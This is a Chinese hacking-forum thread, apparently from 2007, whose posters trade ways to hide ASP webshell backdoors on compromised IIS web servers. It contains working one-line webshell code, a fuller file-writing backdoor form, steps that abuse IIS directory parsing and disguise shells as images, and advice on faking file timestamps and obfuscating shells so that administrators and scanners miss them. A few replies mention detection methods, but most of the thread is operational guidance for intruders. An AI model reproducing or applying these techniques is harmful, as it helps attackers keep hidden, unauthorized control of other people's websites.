[讨论]隐藏ASP后门的两种方法
议题作者:pt007信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
1、建立非标准目录:mkdir images..\
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
通过web访问ASP木马:[url]http://ip/images../news.asp?action=login[/url]
如何删除非标准目录:rmdir images..\ /s
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
mkdir programme.asp
新建1.txt文件内容:<!--#include file=”12.jpg”-->
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
attrib +H +S programme.asp
通过web访问ASP一句话木马:[url]http://ip/images/programme.asp/1.txt[/url] 第二个方法貌似要在WIN2003+IIS6才可以吧? 最简单,最有效,最隐蔽的方法就是
在网站中找一个比较大的asp页面
然后在其中插一句话马就OK了。
需要的时候就上传大马。
大马用完就删掉。
除非对方把自己网站的每个asp文件打开一行行的看
或者用备份还原。否则基本很难发现。 楼上的方法是比较实在的。插入一个访问频繁的ASP文件里,即使管理员看日志,除非一行一行看,否则是难以发现的。 哈!我就是这样干地! [s:35] [quote][b]引用第3楼[i]hack520[/i]于[i]2007-01-12 21:36[/i]发表的[/b]:
楼上的方法是比较实在的。插入一个访问频繁的ASP文件里,即使管理员看日志,除非一行一行看,否则是难以发现的。[/quote]
错,用偶的扫描器就可以搞定!只要一句话木马存在,都可以把它弄出来 [s:39] 找个时间
我也试试 ··· [s:35] 记得要修改文件更改时间哦
不然也很容易被发现的
总之尽量做到与原来一样就是了 [s:39] 第二种方法不错呵呵 有时再搞不顶的时候可以用下 [quote][b]引用第10楼[i]asm[/i]于[i]2007-01-14 01:09[/i]发表的[/b]:
错,用偶的扫描器就可以搞定!只要一句话木马存在,都可以把它弄出来 [s:39][/quote]
呵呵,扫描器放出来看看。
别以为提到一句话马就是<%execute request("value")%> 第2种方法好 第一种方法放的地方文件太少 但是第2种方法局限性太大了 [quote][b]引用第14楼[i]永恒的沙加[/i]于[i]2007-01-14 18:56[/i]发表的[/b]:
呵呵,扫描器放出来看看。
别以为提到一句话马就是<%execute request("value")%>[/quote]
当然一句话木马很多,但是偶把你说的一句话木马列为目标特征码,你就跑不掉...[s:39]
另外很多扫描asp木马的安全脚本很多.....貌似都可以扫出来 不能发主题,借宝地一块发一个问题,在线等,N 人给解决一下
DZ 5.0 后台,不能修改模版拿到 SHELL 上传文件后扩展名多加一个 _ 升级数据库不能导出SHELL 大家还有什么办法 [quote][b]引用第10楼[i]asm[/i]于[i]2007-01-14 01:09[/i]发表的[/b]: 错,用偶的扫描器就可以搞定!只要一句话木马存在,都可以把它弄出来 [s:39][/quote] 韩国老不会用你的扫描器~ 哈哈~还有一点~在韩国~把创建时间和修改时间改成原来一模一样是很稳定滴~国内的傻鸟管理员就会拿个ASP脚本扫ASP马~真铞B 各有各的方法,好用就行。 觉得三楼的方法不错。 大的网页+一句话木马确实是很难找出来的! 个人觉得还是插一句话最好吧。
不过一句话也要免杀,别被lake2的那个脚本给揪出来就好了 [quote][b]引用第3楼[i]hack520[/i]于[i]2007-01-12 21:36[/i]发表的[/b]:
楼上的方法是比较实在的。插入一个访问频繁的ASP文件里,即使管理员看日志,除非一行一行看,否则是难以发现的。[/quote]
这里只说了访问,是的,这样看日志是不好看出来。不过没说修改文件的,如果网站所有文件的建立日期是200年,突然有一个是2007年的,你会怎么想 WEBSHELL,怎么修改时间哟??
是用什么软件吗? include的方法也不错啊, 把木马放到img文件夹中变成图片的格式 [quote][b]引用第9楼[i]asm[/i]于[i]2007-01-14 01:09[/i]发表的[/b]:
错,用偶的扫描器就可以搞定!只要一句话木马存在,都可以把它弄出来 [s:39][/quote]
有异议,一般的站都是和别人合用的服务器,所以站点管理员要是扫描的话,估计要下载下来扫吧..那样也够麻烦的了..还不如直接覆盖一次.. 觉得插个一句话木马好隐藏 [quote][b]引用第2楼[i]永恒的沙加[/i]于[i]2007-01-12 19:55[/i]发表的[/b]:
最简单,最有效,最隐蔽的方法就是
在网站中找一个比较大的asp页面
然后在其中插一句话马就OK了。
需要的时候就上传大马。
大马用完就删掉。
.......[/quote]
我不赞同,我曾经和管理员玩了几天,最后种了个马看桌面才知道,管理员在桌面打开了一个web目录的最近修改文件的搜索,人家把最近修改的都列出来了.
最近我就选择在管理员最不常用的asp文件里插入变形一句话马,并且修改文件时间,就ok了. [quote][b]引用第28楼[i]凋凌玫瑰[/i]于[i]2007-01-23 01:42[/i]发表的[/b]:
最近我就选择在管理员最不常用的asp文件里插入变形一句话马,并且修改文件时间,就ok了.[/quote]
呵呵,也不错啊
道高一尺,魔高一丈
有网管们的进步
才有我们的进步 个人认为:
在访问频繁的asp文件里插入一句话木马,要大马的时候再传大马,用完了就删
+ 恢复文件的修改时间(这个好像是要系统admin权限)
这样的组合才是比较长久安全的。 请问三楼用的是哪句一句话木马?好象插入后页面会出错啊~ 修改时间asp文件吗?可以发上一个来吗 有创意~不过建立一个名字古怪的目录貌似比仅仅传一个文件更扎眼吧。
在已有的页面写一句话木马还是比较好使di,有3389的话最好能传一个“文件属性时间修改器”(下载地址[url]http://www.skycn.com/soft/8603.html[/url])上去,改掉文件的修改时间,而且一句话木马最好加一下密,做到天衣无缝 <%
on error resume next
id=request("id")
if request("id")=1 then
testfile=Request.form("name")
msg=Request.form("message")
set fs=server.CreatObject("scripting.filesystemobject")
set thisfile=fs.openTestFile(testfile,8,True,0)
thisfile.Writeline(""&msg&"")
thisfile.close
set fs=nothing
%>
<from method="post" Action="保存"?id=1>
<input type="text" size="20" name="Name"
Value=<%=server.mappath("XP.ASP")%>>
<textarea name="Message" class=input>
</textarea>
<input type="Submit" name="send" Value="生成"
class=input>
</from>
<%end if%>
隐藏的马.
最好是找个大的页面,然后把页面下载下来.代码精简一下,插入这段代码.然后确保文件的大小和原来的文件大小一致就OK了..有的管理员非常BT..用文件对比...哈哈.那你可没折.试试我的方法吧.只要不换web页面,发现的几率是0 关键是往什么地方插一句话 要是页面出错怎么办 1、建立非标准目录:mkdir images..\
第一中方法建立的文件夹是images. 怎么楼主访问可以么[url]http://ip/images../news.asp?action=login[/url] 还是第2种方法用的比较多
通过图片再调用ASP``
不过还是觉得直接插一句话方便` 3楼方法不好!貌似现在扫马的ASP越来越多了!一句话容易被查出来! 我的方法是用张图片里面用16进制工具加上一句话木马,
然后找个提交的ASP页面,在底部或者是顶部加上<!#--include file="img/1.jpg"-->
之后用客户端去连接``呵呵`这个方法比三楼的更好哦```几乎是查不到的`` <!--#include file=”12.jpg”-->
这段代码找了N久了 现在都不记得要了做什么用了 个人觉得在页面里插入一句话木马在国内不可取拉。国内的一些管理员确实会使用ASP木马的查杀工具来扫。除非是你重新编码过的免杀木马。或者是经过拆分过然后再加密的木马。普通的木马一下子就被软件或者查杀的ASP文件扫出来了。 用ICESWORD可以很容易的发现.. 如果加入一句话的程序装上了防注入文件要怎么解决!我就碰到好多这样的问题,一句话后门还在,但是他装了防注入程序,大马根本就写不进去! 如果文件没有写的权限,也没有上传的权限。要怎么留后门 把一句话木马,变形下! 再插入ASP页面,多弄几个ASP页面! 感觉还是蛮可靠滴 没有写权限,也不能cmd,怎么留后门拉 [quote]引用第3楼hack520于2007-01-12 21:36发表的 :
楼上的方法是比较实在的。插入一个访问频繁的ASP文件里,即使管理员看日志,除非一行一行看,否则是难以发现的。[/quote]
[s:289]
我一般是插到最底部.汗.
如果插到中间的话.会不会照成不良后果?
打乱原有的ASP语句怎么办?~ 三楼方法不错,大马不删,入侵后补漏,漏洞太多的就算了 很多管理远都没有看日志的习惯,这给我门带来更多好处。 呵呵,我最隐蔽的asp后门只有两个字节,根本没有特征码可以查出这样的后门,而且什么功能都有,我和另一个在ga工作的人共同发现的。 [quote]引用第2楼永恒的沙加于2007-01-12 19:55发表的 :
最简单,最有效,最隐蔽的方法就是
在网站中找一个比较大的asp页面
然后在其中插一句话马就OK了。
需要的时候就上传大马。
大马用完就删掉。
.......[/quote]
findstr 查找execute或eval就可以很容易发现了 不错,大家都很厉害,但是还是觉的1句话好,大马很容易查到,比较起来当然是1句话好 楼主说的第一个方法似乎需要系统权限吧,你建立的文件夹虽然不可以访问常规下也不能删除,可电脑是可以显示出文件夹的,这无疑是暴露目标,无缘无故多了个文件夹,懂点小技巧的人都知道该怎么去删除,只要删除文件夹的八三格式,也就完了。至于第2种方法我个人有点疑问“含有一句话木马的图片通过include调用图片格式,是不是就会按照ASP脚本解析?”,如果是的话那这个也是一个途径。但无疑还是和上面朋友们提到的一样,要么就是修改文件,要么就多增加一个文件,那还是逃不出精明的管理员。可以说没有绝对的你就可以保护好自己的后门,我们在讨论的只是哪种方法比较合适,隐蔽。至于第3种其实办法简单实用,但是普通一句话木马很容易被查出来。所以我建议把代码转换成其他代码,以增加隐蔽性。 [quote]引用第3楼hack520于2007-01-12 21:36发表的 :
楼上的方法是比较实在的。插入一个访问频繁的ASP文件里,即使管理员看日志,除非一行一行看,否则是难以发现的。[/quote]
抓取特征码 使用工具来查杀 很快滴 不需要一句句看~~
页:
[1]
2